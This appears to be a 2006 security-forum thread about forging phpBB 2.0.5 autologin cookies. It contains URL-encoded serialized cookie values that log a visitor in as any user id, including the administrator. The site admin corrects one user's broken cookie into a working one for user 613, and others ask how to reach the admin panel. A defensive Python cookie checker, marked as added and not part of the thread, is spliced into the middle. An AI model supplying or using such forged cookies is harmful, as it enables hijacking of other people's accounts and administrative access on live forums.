IT Security and Insecurity Portal

Use PHPBB cookie exploit for any user?

Posted: Tue Jun 27, 2006 4:42 pm
cheaparse
Beginner
Joined: Jun 27, 2006
Posts: 2

I have a question guys. On a phpBB 2.0.5 forum, I have logged in under admin with the cookie:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
and it works fine, I can do admin etc. So I logged out, but I want to know how I would be able to log in under any user. For example, if I wanted to log in under the user with a uid of 613, it should be this, correct?
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%26132%22%3B%7D
But it doesn't let me, I just keep getting sent back to the login screen.
I tried it with other uids, but I still couldn't log in, please help

Posted: Tue Jun 27, 2006 10:23 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Try this:
Code:
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22613%22%3B%7D

P.S. I am going to put up an online urldecoder/encoder soon. It will be useful for such string transformations as this specific cookie manipulation.
Stay in touch!
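
A defender-side check for the cookie format discussed above, as an added example that is not part of the original thread: it URL-decodes a cookie value, parses the PHP-serialized array, and reports whether the string length prefixes are consistent (the `s:1` versus `s:3` difference between the two cookies above) and whether `autologinid` arrives as a non-string type. The names `check_cookie` and `SAMPLES`, and the rule that a genuine `autologinid` is a string, are assumptions of this example.

```python
import re
from urllib.parse import unquote
# PHP serialize() subset: a:N:{..}, s:LEN:"..", b:0/1, i:N (ASCII input only).
_TOKEN = re.compile(r'([abis]):(-?\d+)([:;])')

def _parse(data, pos=0):
    m = _TOKEN.match(data, pos)
    if not m or (int(m.group(2)) < 0 and m.group(1) != "i"):
        raise ValueError(f"bad token at offset {pos}")
    kind, num, sep, pos = m.group(1), int(m.group(2)), m.group(3), m.end()
    if kind in "bi" and sep == ";":
        return (bool(num) if kind == "b" else num), pos
    if kind == "s" and sep == ":":
        end = pos + 1 + num  # the declared length must land on the closing quote
        if data[pos:pos + 1] != '"' or data[end:end + 2] != '";':
            raise ValueError(f"string length or quoting wrong at offset {pos}")
        return data[pos + 1:end], end + 2
    if kind == "a" and sep == ":" and data[pos:pos + 1] == "{":
        out, pos = {}, pos + 1
        for _ in range(num):
            key, pos = _parse(data, pos)
            out[key], pos = _parse(data, pos)
        if data[pos:pos + 1] != "}":
            raise ValueError(f"array not closed at offset {pos}")
        return out, pos + 1
    raise ValueError(f"bad token at offset {pos}")

def check_cookie(raw):
    """Classify one URL-encoded cookie value as ok / suspicious / malformed."""
    text = unquote(raw)
    try:
        data, end = _parse(text)
        if end != len(text) or not isinstance(data, dict):
            raise ValueError("not a single serialized array")
    except (ValueError, TypeError, RecursionError) as exc:
        return "malformed", str(exc)
    # Assumption: a genuine autologinid is a string; any other type is flagged.
    if "autologinid" in data and not isinstance(data["autologinid"], str):
        return "suspicious", f"autologinid is {type(data['autologinid']).__name__}"
    return "ok", f"userid={data.get('userid')!r}"

# Two cookie values quoted in the thread, plus one constructed well-formed value.
SAMPLES = [
    "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%26132%22%3B%7D",
    "a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A3%3A%22613%22%3B%7D",
    'a:2:{s:11:"autologinid";s:4:"abcd";s:6:"userid";s:1:"5";}',  # constructed
]
for raw in SAMPLES:
    print(check_cookie(raw))
```

Run over cookie values taken from web server or application logs, the "suspicious" verdict marks requests worth correlating with session creation for the affected user id.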

Posted: Sat Jul 01, 2006 12:00 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Posted: Mon Jul 03, 2006 6:17 pm
superninja
Active user
Joined: Jul 03, 2006
Posts: 38

Hi, what's this decoder do?

Posted: Mon Jul 03, 2006 9:48 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

superninja wrote:
Hi, what's this decoder do?

It will turn "foo bar" into "foo%20bar" and vice versa.
If you look at a URL in a browser, you will often see "strange" text filled with "%" signs. Right? This is so-called "urlencoded" text.

Posted: Mon Jul 03, 2006 9:51 pm
superninja
Active user
Joined: Jul 03, 2006
Posts: 38

Oh, I get it, it's like & splits the variables in PHP

Posted: Mon Jul 03, 2006 10:28 pm
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Posted: Tue Jul 04, 2006 9:01 am
R0cK3R
Regular user
Joined: Jul 04, 2006
Posts: 5

Oh yea... I have a problem with this cookie... I can't login as an admin... I do everything ok... the go to administration panel link reveals just fine... but then it asks me for password and user.. and I can't login :o omg... some help...?

Posted: Tue Jul 04, 2006 9:32 am
R0cK3R
Regular user
Joined: Jul 04, 2006
Posts: 5

Ok sorry :p I am a beginner to this forum... I think I've found what I was looking for.. thx

Posted: Tue Jul 04, 2006 11:03 am
waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

R0cK3R wrote:
Oh yea... I have a problem with this cookie... I can't login as an admin... I do everything ok... the go to administration panel link reveals just fine... but then it asks me for password and user.. and I can't login :o omg... some help...?

Yep, this is a special protection measure in all new phpBB versions. This is meant to make phpBB haxoring harder and it actually does.
When I wrote that tutorial, there was no additional password asking ...
All times are GMT